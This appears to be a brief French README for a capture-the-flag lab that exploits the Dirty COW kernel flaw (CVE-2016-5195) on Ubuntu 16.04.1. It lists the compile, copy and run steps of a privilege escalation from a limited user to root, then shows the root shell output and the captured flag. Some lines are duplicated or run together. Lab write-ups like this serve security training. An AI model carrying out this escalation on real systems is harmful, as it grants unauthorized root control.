
Exploitation de la vulnérabilité Dirty COW (CVE-2016-5195) sous Ubuntu 16.04.1.
Exploitation de la vulnérabilité Dirty COW (CVE-2016-5195) sur Ubuntu 16.04.1.
cat > README.md <<'EOF'
Ce laboratoire démontre l'exploitation de la vulnérabilité Dirty COW sur un système Ubuntu Server 16.04.1 avec un noyau vulnérable.
L'objectif était d'élever les privilèges depuis un utilisateur limité (student) jusqu'à root et de capturer le flag situé dans /root/flag.txt.
Linux 4.4.0-31-generic (vulnérable).ubuntu:16.04, dirtycow_passwd.c a été compilé → binaire dirty.scp dirty student@<IP>:~/.chmod +x ~/dirty && ~/dirty → su root (mot de passe dirtyCowFun).cat /root/flag.txt → 4GEEKS{Y0u_G0t_R00t}.root@ubuntu:/home/student# whoami
root
root@ubuntu:/home/student# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/student# cat /root/flag.txt
4GEEKS{Y0u_G0t_R00t}
Flag obtenu